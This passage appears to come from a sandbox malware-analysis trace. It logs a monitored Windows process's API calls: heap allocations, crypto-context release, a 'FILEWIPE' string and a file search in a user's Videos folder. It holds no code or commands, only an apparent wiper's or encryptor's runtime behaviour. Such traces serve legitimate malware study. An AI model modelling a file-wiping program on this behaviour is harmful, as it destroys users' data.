Flags=0x0, Size=0x4) returned 0x7da228 [0043.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0043.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.859] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0043.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0043.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.859] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0043.859] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0043.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc10 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.860] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.860] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.860] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c910 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbc8 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889628 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889550 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0043.861] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.861] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.861] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0043.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.861] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0043.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0043.862] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0043.862] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.862] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0043.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0043.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.862] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.862] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0043.862] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.862] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.862] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.862] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0043.862] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.862] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.863] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.863] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0043.863] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.863] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.863] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0043.863] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.863] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0043.863] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.863] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c730 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0043.864] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0043.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.864] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.864] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0043.864] FreeLibrary (hLibModule=0x754b0000) returned 1 [0043.864] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.864] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.864] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0043.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.867] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.867] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.867] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0043.867] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0043.867] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.868] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.868] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, 